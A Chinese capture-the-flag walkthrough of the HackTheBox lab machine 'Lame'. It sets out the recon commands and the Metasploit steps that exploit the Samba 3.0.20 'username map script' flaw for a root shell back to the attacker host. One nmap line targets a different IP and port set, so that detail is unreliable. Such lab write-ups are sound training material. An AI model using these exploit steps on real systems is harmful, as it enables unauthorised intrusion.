靶机信息
靶机地址:
https://app.hackthebox.com/machines/Lame
靶场: HackTheBox.com
靶机名称:Lame
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Kali 10.10.16.4
靶机:10.10.10.3
信息收集
扫描端口
扫描靶机开放的服务端口
sudo nmap -p- 10.10.10.3
sudo nmap -sC -sV -p 80,88,139,445,389,593,636 10.10.10.175 -oN nmap.log
靶机开放21(FTP),22(SSH),139、445(SMB)3632(distccd分布式编译服务),先来看看21端口
TCP:21(FTP匿名访问)
ftp [email protected]
FTP是空的,猜测需要用户登录,再来看看SMB服务
TCP:139、445(SMB)
smbmap -H 10.10.10.3
发现tmp目录可读写,继续扫描tmp目录
smbmap -H 10.10.10.3 -r 'tmp'
目录下有个txt文件,下载下来看看
smbmap -H 10.10.10.3 --download 'tmpvgauthsvclog.txt.0'
没有可利用信息,nmap扫描结果中FTP服务是由vsFTP2.3.4d版本开启,SMB版本为3.0.20来找找这两个版本是否存在漏洞
漏洞利用(Exploitation)
msfconsole -q
search vsftp
use 0
发现该版本漏洞的exp,验证一下
show options
set RHOSTS 10.10.10.3
run
攻击失败,再来看看smb
https://www.exploit-db.com/
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
发现命令执行漏洞,在msf带有直接利用的exp,来验证一下
search Username map script
use 1
show options
set RHOSTS 10.10.10.3
set LHOST 10.10.16.4
run
攻击成功,直接拿到root权限,来找下flag
cat /home/makis/user.txt
cat /root/root.txt
拿到flag,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.143 HTB:Lame(OSCP Prep)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论